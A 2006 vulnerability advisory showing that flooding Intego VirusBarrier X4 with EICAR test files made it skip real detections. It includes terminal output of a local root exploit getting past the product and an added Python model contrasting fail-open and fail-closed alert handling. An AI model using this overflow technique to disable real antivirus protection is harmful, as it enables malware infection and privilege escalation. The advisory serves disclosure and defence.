DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com
Product: 'Intego VirusBarrier X4 <= VirusBarrierX47070.dmg'
References:
http://www.digitalmunition.com/DMA[2006-1031a].txt
Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus
security solution for Macintosh computers, by Intego, the
leading publisher of personal security software for Macintosh. It offers
thorough protection against viruses of all types, coming
from infected files or applications, whether on CD-ROMs, DVDs or other
removable media, or on files downloaded over the Internet
or other types of networks.
Intego VirusBarrier X4 protects your computer from viruses by constantly
examining all the files that your computer opens and
writes, as well as watching for suspicious activity that may be the sign
of viruses acting on applications or other files. With
Intego VirusBarrier X4 on your computer, you can rest assured that your
Macintosh has the best protection available against
viruses of all kinds.
Although VirusBarrier does a pretty good job of halting malicious activity,
the product currently suffers from a flaw related to the number of alerts
it can process simultaneously. If an attacker is able to trigger multiple
alerts in succession within a very short amount of time, he or she may be
able to cause VirusBarrier to completely ignore positive matches against
virus definitions. The consequences of ignored matches may include full
system compromise or further spreading of malware.
As an example we will first show how VirusBarrier normally stops a local
root exploit with behavior similar to 'OSX.ExploitMachex.A', then we will
demonstrate how the VirusBarrier protection can be bypassed using a simple
flood of EICAR test files.
Any typical attempt to access or execute a file or program that is a match
for a VirusBarrier definition results in an alert on the
user interface. There is a sweet lookin insulin bottle on the screen that
slowly empties as the virus nears eradication.
'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do
('Ignore' || 'Repair')?
Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus
program existed at all.
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)
On the other hand, if you choose 'Repair', the process is terminated dead in
its tracks and the file is nulled out:
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit
The above output demonstrates how VirusBarrier is supposed to work. Under
normal circumstances this would be adequate to stop a malicious attack.
If however an attacker floods the file system with dummy virus files at a
quick rate, the VirusBarrier software will promptly stop responding after
presenting the user with a few audible and visual alerts. After roughly 40
infected files in a row the system becomes confused, and in some cases
VirusBarrier may stop responding completely. (Intego confirmed a limit of
20 files.)
When under attack the user may see dozens of messages on the screen. With
our example code the messages are similar to the following:
'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?
From the attacker's standpoint the exploitation is fairly quick and simple.
Our example uses a local root exploit; however, this tactic could easily be
applied to any existing malware technique that Intego VirusBarrier protects
against. Code could in theory be run as a precursor to an InqTana attack as
a means to bypass the Intego protection. The existing signatures for
InqTana.A, B, C and D would then be completely useless, and an E variant
would be born.
virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl Pwntego.sh README.txt pwntego.uu
rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;
p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel),
81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied
In the above example 'OSX.ExploitMachex.A' is being executed on a machine
that is actively protected by VirusBarrier. In a matter of
seconds the Intego engine is flooded and the attacker has the ability to
completely ignore any Intego virus and malware definitions.
One fun side effect of this attack is that the user must manually dismiss a
number of alerts. The user is either forced to wait for each alert to time
out on its own after several seconds or to respond to each one individually.
This attack has a fairly obvious signature in the VirusBarrier log
(/var/log/vbmgvx.log) if the attacker is making use of the example code
provided in this text. Obviously, using random viruses and better random
locations and names is a possible vector for a craftier attacker.
virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 by EICAR Test
With the current fixes in place, once VirusBarrier has 19 alerts open, the
next piece of malware is simply quarantined until the administrator can
repair it. In our example, the additional processes get a permission error
when they are executed.
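As an added illustration of the flaw class (a model written for this page,
not Intego's code; VirusBarrier's internals are not public), the following
simulates an engine that can hold only a bounded number of unanswered alerts
and compares the fail-open behaviour described above, where an over-capacity
detection is silently let through, with the fail-closed behaviour of the fix,
where it is quarantined. The capacity of 20 is the figure Intego confirmed;
the 8-second alert timeout, the decoy rate and the verdict names are
assumptions.

```python
"""Bounded alert queue, fail-open versus fail-closed (added model, not Intego's code)."""
from collections import deque

CAPACITY = 20    # alerts the engine can hold open at once; the figure Intego confirmed
TIMEOUT = 8.0    # seconds an unanswered alert stays open before it times out; ASSUMED


class AlertQueue:
    """Engine model: each detection either gets a prompt slot or overflows.

    fail_closed=False models the pre-fix behaviour (overflow is ignored and
    the file runs); fail_closed=True models the fix (overflow is quarantined).
    """

    def __init__(self, fail_closed, capacity=CAPACITY, timeout=TIMEOUT):
        self.fail_closed = fail_closed
        self.capacity = capacity
        self.timeout = timeout
        self.open = deque()   # expiry times of alerts still waiting for a user answer

    def _expire(self, now):
        # Alerts the user never answered drop off after `timeout` seconds.
        while self.open and self.open[0] <= now:
            self.open.popleft()

    def on_detection(self, now, signature):
        """Return the verdict for a file matching `signature` scanned at time `now`."""
        self._expire(now)
        if len(self.open) < self.capacity:
            self.open.append(now + self.timeout)
            return "prompt"       # user sees the Ignore/Repair dialog
        return "quarantined" if self.fail_closed else "ignored"


def run_scenario(fail_closed, decoys=25, decoy_interval=0.1, payload_at=3.0):
    """Flood with `decoys` EICAR hits, then scan the real payload at `payload_at`.

    Returns (verdict for the payload, number of decoys that earned a prompt).
    With the defaults the decoys land over the first 2.4 s, so at 3.0 s every
    slot is still occupied: the verdict depends entirely on the overflow policy.
    """
    q = AlertQueue(fail_closed)
    prompts = 0
    for i in range(decoys):
        if q.on_detection(i * decoy_interval, "EICAR Test") == "prompt":
            prompts += 1
    return q.on_detection(payload_at, "OSX.ExploitMachex.A"), prompts


if __name__ == "__main__":
    print("pre-fix  (fail open):  ", run_scenario(fail_closed=False))
    print("post-fix (fail closed):", run_scenario(fail_closed=True))
    # Once the unanswered alerts time out the slots free up and the payload is
    # prompted normally again, which is why the flood must precede the payload
    # closely in time.
    print("late payload, pre-fix: ", run_scenario(fail_closed=False, payload_at=20.0))
```

The point of the model is the design rule, not the numbers: any bounded
resource in the enforcement path (alert slots, scan threads, a dialog queue)
needs an explicit overflow policy, and that policy has to deny rather than
permit, or the bound itself becomes the bypass.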
Of course since everyone knows there is no malware for Macintosh this
scenario would quite simply never be encountered..... *smirk*
The Intego staff were more than helpful and willing to address this issue
in a timely fashion. After communications were established the problem was
addressed, and fixes were out the door to customers in a matter of 2 days.
How about that for turnaround time!
Workaround:
Please update to the latest version of Intego VirusBarrier and the latest
virus definitions (Vdefs).
http://www.intego.com/services/updates.asp?product=VirusBarrier
Intego has fixed this bug in the 2006/11/01 Vdef files.